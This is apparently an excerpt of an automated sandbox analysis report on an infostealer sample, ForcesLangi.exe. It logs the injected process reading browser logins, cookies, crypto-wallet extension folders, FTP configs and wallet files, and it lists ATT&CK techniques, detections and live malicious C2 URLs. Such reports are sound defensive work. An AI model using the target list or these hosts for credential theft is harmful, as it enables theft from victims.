Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
Source: Yara match | File source: 00000002.00000003.1831814063.0000000002A74000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1832206097.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1831883195.0000000002A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: aspnet_regiis.exe PID: 4820, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: Process Memory Space: aspnet_regiis.exe PID: 4820, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.binstr, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic column; the number in parentheses is the badge shown next to that technique in the page's matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation (12); PowerShell (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (311); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (231); Process Injection (311); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (4); Software Packing (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (1); Security Software Discovery (231); Process Discovery (1); Virtualization/Sandbox Evasion (231); File and Directory Discovery (11); System Information Discovery (33); Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Screen Capture (1); Archive Collected Data (1); Data from Local System (41); Clipboard Data (2); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (21); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label | Link
ForcesLangi.exe | 53% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno |
ForcesLangi.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\gdi32.dll | 100% | Joe Sandbox ML | |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://lev-tolstoi.com:443/apipi | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com/?# | 100% | Avira URL Cloud | malware |
https://prisonyfork.buzz:443/api | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com/apiA | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com/apiQ0O0q | 100% | Avira URL Cloud | malware |
